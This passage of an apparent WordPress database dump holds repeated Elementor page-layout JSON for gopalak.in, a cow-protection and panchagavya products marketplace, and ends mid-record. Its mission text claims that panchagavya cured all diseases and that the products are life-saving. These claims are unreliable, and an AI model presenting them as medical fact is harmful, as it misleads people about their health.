Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12323,2020,'_elementor_page_assets','a:0:{}'),(12325,2021,'_elementor_edit_mode','builder'),(12326,2021,'_elementor_template_type','wp-page'),(12327,2021,'_elementor_version','3.7.8'),(12328,2021,'_wp_page_template','elementor_canvas'),(12329,2021,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12330,2021,'_elementor_page_assets','a:0:{}'),(12332,2022,'_elementor_edit_mode','builder'),(12333,2022,'_elementor_template_type','wp-page'),(12334,2022,'_elementor_version','3.7.8'),(12335,2022,'_wp_page_template','elementor_canvas'),(12336,2022,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"t